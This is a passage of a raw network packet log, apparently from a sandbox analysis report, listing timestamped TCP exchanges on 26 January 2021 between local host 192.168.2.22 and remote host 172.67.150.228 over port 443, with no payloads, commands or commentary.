Jan 26, 2021 21:31:57.020040035 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.020056963 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.020066023 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.020096064 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.020117044 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.020812035 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.020840883 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.020872116 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.020884991 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.020901918 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.020917892 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.020927906 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.020945072 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.020955086 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.020972967 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.021003962 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.021738052 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.021771908 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.021800041 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.021801949 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.021823883 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.021828890 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.021846056 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.021855116 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.021881104 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.021887064 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.021917105 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.022753954 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.022780895 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.022806883 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.022811890 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.022840977 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.022841930 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.022867918 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.022871017 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.022895098 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.022916079 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.022949934 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.023668051 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.023694992 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.023720026 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.023724079 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.023746967 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.023756027 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.023773909 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.023778915 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.023807049 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.023823977 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.023853064 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.024055958 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.024633884 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.024673939 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.024699926 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.024708033 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.024719000 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.024744987 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.024749041 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.024779081 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.024782896 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.024817944 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.024822950 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.024867058 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.025552988 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.025590897 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.025604010 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.025624990 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.025629997 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.025660992 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.025662899 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.025698900 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.025698900 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.025738001 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.028770924 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.031677008 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.031713963 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.031729937 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.031747103 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.031749964 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.031785965 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.031788111 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.031820059 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.031821012 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.031856060 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.031861067 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.031898975 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.032085896 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.032129049 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.078212976 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.078269005 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.078310013 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.078325033 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.078349113 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.078350067 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.078353882 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.078387022 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.078391075 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.078425884 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.078429937 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.078464985 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.078586102 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.078629971 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.078629017 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.078674078 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.078680038 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.078717947 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.078731060 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.078754902 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.078759909 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.078790903 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.078803062 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.078845024 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.079452038 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.079493999 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.079515934 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.079531908 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.079534054 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.079580069 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.079580069 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.079622984 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.079622984 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.079662085 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.079673052 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.079690933 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.080447912 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.080492020 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.080532074 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.080547094 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.080569029 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.080571890 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.080609083 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.080621004 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.080648899 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.080667019 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.080707073 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.081439972 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.081479073 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.081489086 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.081517935 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.081520081 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.081557035 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.081562042 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.081594944 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.081594944 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.081634998 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.081639051 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.081671000 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.082309008 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.082350969 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.082361937 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.082386017 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.082391024 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.082427979 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.082462072 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.082465887 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.082467079 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.082504988 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.082514048 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.082542896 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.083234072 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.083306074 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.083348989 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.083359003 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.083383083 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.083386898 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.083424091 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.083426952 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.083461046 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.083465099 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.083498001 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.083503962 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.083537102 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.084304094 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.084345102 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.084347010 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.084382057 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.084387064 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.084419012 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.084429026 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.084455967 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.084458113 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.084495068 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.084503889 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.084551096 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.085134983 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.085175991 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.085176945 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.085212946 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.085225105 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.085243940 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.085251093 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.085294008 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.088138103 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.093116045 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.093169928 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.093199015 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.093213081 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.093218088 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.093250990 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.093254089 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.093287945 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.093293905 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.093324900 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.093326092 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.093374014 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.093514919 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.093573093 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.135880947 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.135936022 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.135974884 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.135984898 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.135997057 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.136023998 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.136029959 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.136065960 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.136066914 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.136101007 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.136106014 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.136141062 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.136311054 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.136349916 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.136349916 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.136384964 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.136389971 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.136425018 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.136429071 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.136462927 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.136465073 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.136502981 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.136503935 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.136538982 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.137187004 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.137228966 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.137239933 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.137267113 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.137268066 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.137301922 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.137304068 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.137336969 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.137343884 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.137377977 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.137403011 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.137437105 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.138165951 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.138205051 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.138210058 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.138240099 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.138243914 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.138278008 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.138282061 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.138314962 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.138319969 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.138353109 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.138359070 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.138394117 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.139086962 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.139126062 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.139128923 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.139163017 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.139167070 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.139199972 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.139204979 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.139236927 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.139241934 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.139273882 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.139280081 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.139312983 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.140070915 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.140110016 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.140116930 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.140176058 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.140178919 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.140207052 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.140214920 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.140280008 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.140285969 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.140332937 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.140345097 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.140369892 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.140841007 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.140997887 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.141038895 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.141043901 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.141076088 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.141077995 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.141110897 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.141115904 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.141150951 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.141155005 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.141191959 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.141191006 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.141232967 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.142008066 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.142050028 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.142055988 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.142081976 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.142088890 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.142119884 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.142127991 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.142169952 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.142174959 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.142206907 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.142216921 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.142251015 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.142919064 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.142957926 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.142963886 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.142992020 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.142997026 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.143028021 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.143033981 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.143064022 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.143080950 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.143112898 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.143121958 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.143157959 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.144726992 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.146567106 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.146608114 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.146629095 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.146647930 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.146672010 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.146704912 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.146714926 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.146745920 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.146750927 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.146780968 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.146796942 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.146828890 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.146831036 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.146861076 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.147159100 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.147188902 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.147198915 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.147219896 CET	49167	443	192.168.2.22	172.67.150.228
Jan 26, 2021 21:31:57.194329977 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.194390059 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.194441080 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.194483995 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.194521904 CET	443	49167	172.67.150.228	192.168.2.22
Jan 26, 2021 21:31:57.194539070 CET	49167	443	192.168.2.22	172.67.150.228
